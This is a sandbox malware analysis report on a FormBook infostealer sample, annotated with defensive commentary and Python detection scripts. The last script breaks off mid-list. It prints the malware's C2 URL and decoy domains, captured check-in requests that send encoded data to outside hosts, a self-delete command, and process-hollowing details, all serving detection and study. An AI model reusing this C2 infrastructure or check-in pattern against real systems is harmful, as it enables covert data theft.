
Analysis Report Nz7NA3F7z7.exe

Overview

General Information

Sample Name: Nz7NA3F7z7.exe
Analysis ID: 361772
MD5: 059a1308ebdfae6ee52fd646d341aeac
SHA1: 4bea37c03b3e0ad1ccdea6675819f363c881bf39
SHA256: ff9b0f1788f165edd1e2811c182a990a352a12453706f85d90eaac2601597862
Tags: exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification radar (axes): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious
  • System is w10x64
  • Nz7NA3F7z7.exe (PID: 6132 cmdline: 'C:\Users\user\Desktop\Nz7NA3F7z7.exe' MD5: 059A1308EBDFAE6EE52FD646D341AEAC)
    • Nz7NA3F7z7.exe (PID: 3096 cmdline: 'C:\Users\user\Desktop\Nz7NA3F7z7.exe' MD5: 059A1308EBDFAE6EE52FD646D341AEAC)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6104 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 852 cmdline: /c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
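The process tree above is the whole hollowing chain in one picture: the sample relaunches itself (the second Nz7NA3F7z7.exe, created suspended and overwritten), the payload moves into explorer.exe, explorer.exe starts a random SysWOW64 applet (colorcpl.exe) that carries the final FormBook image, and that applet runs cmd.exe /c del against the original file. The following script is an added example, not part of the Joe Sandbox report: it transcribes the tree into flat parent/child records and runs three process-creation heuristics over them. The field names follow no particular EDR schema, and the explorer.exe and cmd.exe image paths are not on the page, so only their basenames are recorded.

```python
"""Process-tree heuristics for the hollowing chain recorded in the report.

Added example; this is not part of the Joe Sandbox report. The event records
are transcribed from the process tree above. Field names (pid, ppid, image,
cmdline) follow no particular EDR schema, and the explorer.exe and cmd.exe
image paths are not on the page, so only their basenames are recorded.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = r"C:\Users\user\Desktop\Nz7NA3F7z7.exe"

# Constructed from the report's process tree (PIDs and command lines as shown).
EVENTS = [
    ProcEvent(6132, 0, SAMPLE, SAMPLE),
    ProcEvent(3096, 6132, SAMPLE, SAMPLE),
    ProcEvent(3388, 3096, "explorer.exe", ""),
    ProcEvent(6104, 3388, r"C:\Windows\SysWOW64\colorcpl.exe",
              r"C:\Windows\SysWOW64\colorcpl.exe"),
    ProcEvent(852, 6104, "cmd.exe", f"/c del '{SAMPLE}'"),
    ProcEvent(5676, 852, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Parents that routinely launch cmd.exe; anything else spawning a shell is odd.
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "services.exe"}

DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<path>[^'"]+)""", re.IGNORECASE)


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        child, par = basename(e.image), basename(parent.image)
        # R1: a process re-launching its own image with an identical command
        # line is the staging step for hollowing (child created suspended).
        if child == par and e.cmdline == parent.cmdline:
            findings.append(("self_relaunch", e.pid))
        if child == "cmd.exe":
            # R2: a shell started by something that is not a known shell host.
            if par not in SHELL_PARENTS:
                findings.append(("cmd_from_unexpected_parent", e.pid))
            # R3: cmd /c del of a file under a user profile: dropper cleanup.
            m = DEL_RE.search(e.cmdline)
            if m and m.group("path").lower().startswith(r"c:\users"):
                findings.append(("self_delete_user_file", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:28s} pid={pid}")
```

On this tree the script flags PID 3096 (self relaunch) and PID 852 twice (cmd.exe under colorcpl.exe, and the del of the sample). Note what the rules deliberately do not use: the Nz7NA3F7z7.exe -> explorer.exe edge. Joe Sandbox draws the injecting process as the parent, but on a real endpoint explorer.exe already exists and the relationship shows up as a cross-process write or thread-context change, not as a process-creation event, so a rule keyed on "explorer.exe with an odd parent" would never fire outside the sandbox.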
{
  "C2 list": [
    "www.856380692.xyz/nsag/"
  ],
  "decoy": [
    "usopencoverage.com",
    "5bo5j.com",
    "deliveryourvote.com",
    "bestbuycarpethd.com",
    "worldsourcecloud.com",
    "glowtheblog.com",
    "translations.tools",
    "ithacapella.com",
    "machinerysubway.com",
    "aashlokhospitals.com",
    "athara-kiano.com",
    "anabittencourt.com",
    "hakimkhawatmi.com",
    "fashionwatchesstore.com",
    "krishnagiri.info",
    "tencenttexts.com",
    "kodairo.com",
    "ouitum.club",
    "robertbeauford.net",
    "polling.asia",
    "evoslancete.com",
    "4676sabalkey.com",
    "chechadskeitaro.com",
    "babyhopeful.com",
    "11376.xyz",
    "oryanomer.com",
    "jyxxfy.com",
    "scanourworld.com",
    "thevistadrinksco.com",
    "meow-cafe.com",
    "xfixpros.com",
    "botaniquecouture.com",
    "bkhlep.xyz",
    "mauriciozarate.com",
    "icepolo.com",
    "siyezim.com",
    "myfeezinc.com",
    "nooshone.com",
    "wholesalerbargains.com",
    "winabeel.com",
    "frankfrango.com",
    "patientsbooking.info",
    "ineedahealer.com",
    "thefamilyorchard.net",
    "clericallyco.com",
    "overseaexpert.com",
    "bukaino.net",
    "womens-secrets.love",
    "skinjunkie.site",
    "dccheavydutydiv.net",
    "explorerthecity.com",
    "droneserviceshouston.com",
    "creationsbyjamie.com",
    "profirma-nachfolge.com",
    "oasisbracelet.com",
    "maurobenetti.com",
    "mecs.club",
    "mistressofherdivinity.com",
    "vooronsland.com",
    "navia.world",
    "commagx4.info",
    "caresring.com",
    "yourstrivingforexcellence.com",
    "alpinevalleytimeshares.com"
  ]
}
Yara matches, memory dumps:

Source | Rule | Description | Author | Strings
00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further entries are collapsed in the source report.)

Two of the matched byte patterns are worth reading rather than just counting. $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) is add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing measurement behind the "Tries to detect virtualization through RDTSC time measurements" signature. The three JPCERT strings are each a push imm32 (opcode 68) of the constant the rule associates with sqlite3_step, sqlite3_column_text and sqlite3_column_blob; FormBook resolves imports by hash, so these constants, not the API names, are what survives in memory.

Yara matches, unpacked PEs:

Source | Rule | Description | Author | Strings
1.1.Nz7NA3F7z7.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.Nz7NA3F7z7.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.Nz7NA3F7z7.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further entries are collapsed in the source report.)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack | Malware Configuration Extractor: FormBook, C2 list www.856380692.xyz/nsag/ plus 64 decoy domains (the full configuration is listed under Overview above)
Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Nz7NA3F7z7.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.colorcpl.exe.5427960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.colorcpl.exe.11225c8.1.unpack | Avira: Label: TR/Patched.Ren.Gen

Compliance:

Uses 32bit PE files
Source: Nz7NA3F7z7.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Binary contains paths to debug symbols
Source: Binary string: colorcpl.pdbGCTL | source: Nz7NA3F7z7.exe, 00000001.00000002.275552180.0000000000670000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdb | source: Nz7NA3F7z7.exe, 00000001.00000002.275552180.0000000000670000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Nz7NA3F7z7.exe, 00000000.00000003.217088763.0000000002980000.00000004.00000001.sdmp, Nz7NA3F7z7.exe, 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Nz7NA3F7z7.exe, colorcpl.exe
(colorcpl.pdb and wntdll.pdb are Microsoft symbol names, not debug information belonging to the sample: the hollowed Nz7NA3F7z7.exe process carries mapped copies of colorcpl.exe and ntdll.dll in its own address space, which fits the injection chain in the process tree.)
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00405EC2 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00402671 FindFirstFileA
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 4x nop then pop esi | 1_2_00415843
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 4x nop then pop ebx | 1_2_00406A95
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 4x nop then pop edi | 1_2_004162BB
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 4x nop then pop edi | 1_2_00415675
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 4x nop then pop esi | 1_1_00415843
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop esi | 7_2_00DA5843
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop ebx | 7_2_00D96A95
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop edi | 7_2_00DA62BB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop edi | 7_2_00DA5675
(The same four functions sit at the same offsets from their module base in PID 1 (0x00400000 + 0x15843, 0x6A95, 0x162BB, 0x15675) and in colorcpl.exe (0x00D90000 + the same four offsets): the colorcpl.exe instance is executing the injected FormBook image, not its own code.)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 91.195.240.94:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.856380692.xyz/nsag/
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB HTTP/1.1 | Host: www.worldsourcecloud.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL HTTP/1.1 | Host: www.tencenttexts.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt HTTP/1.1 | Host: www.glowtheblog.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR HTTP/1.1 | Host: www.myfeezinc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk HTTP/1.1 | Host: www.wholesalerbargains.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
(Every captured request goes to a host from the decoy list, on the same /nsag/ path as the configured C2, with only Host and Connection headers. The Snort rules fire on the cover traffic as well, so the alerted destination IPs are where the decoy names resolved; the Host header, not the IP, separates the real C2 from the decoys.)
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 103.88.34.80
Source: Joe Sandbox View | IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvince
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: unknown | DNS traffic detected: queries for: www.worldsourcecloud.com
Source: explorer.exe, 00000003.00000000.247150647.000000000F540000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Nz7NA3F7z7.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Nz7NA3F7z7.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
(The nsis.sf.net strings are the standard NSIS installer error text; together with the ns7CE9.tmp-style plugin directory of the dropped eeysn2cunceh9.dll they identify the outer layer of the sample as an NSIS package.)
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
(The explorer.exe strings above are font-vendor and licence URLs resident in the host process's own memory before injection; they are not indicators tied to the sample and should not be extracted as IOCs.)
Source: colorcpl.exe, 00000007.00000002.488303351.00000000055A2000.00000004.00000001.sdmp | String found in binary or memory: https://www.123-reg-new-domain.co.uk/iframe.html
Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: Nz7NA3F7z7.exe, 00000000.00000002.222814834.000000000077A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
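The extracted configuration (one C2 URL plus a decoy list) and the captured HTTP rows above together describe the FormBook check-in shape: a GET to the configured URI path, against either the C2 host or one of the decoys, carrying exactly two query parameters of which one is a long base64-alphabet blob, and no User-Agent header. The following script is an added example, not part of the Joe Sandbox report or of any FormBook tooling: it rebuilds the five recorded requests (request line, Host and Connection headers are on the page; the CRLF framing is assumed), adds one constructed benign request to the same decoy domain for contrast, and classifies each against the config. Only the decoy domains that actually appear in the captured traffic are kept from the full list.

```python
"""Match captured HTTP requests against the extracted FormBook configuration.

Added example; this is not part of the Joe Sandbox report. The first five
requests are rebuilt from the "HTTP traffic detected" rows above (request line,
Host and Connection headers are on the page; CRLF framing is assumed). The
sixth request is constructed as a benign contrast case. Only the decoy domains
that actually appear in the captured traffic are kept from the config.
"""
import re

CONFIG = {
    "C2 list": ["www.856380692.xyz/nsag/"],
    "decoy": ["worldsourcecloud.com", "tencenttexts.com", "glowtheblog.com",
              "myfeezinc.com", "wholesalerbargains.com"],
}

REQUESTS = [
    "GET /nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB HTTP/1.1\r\n"
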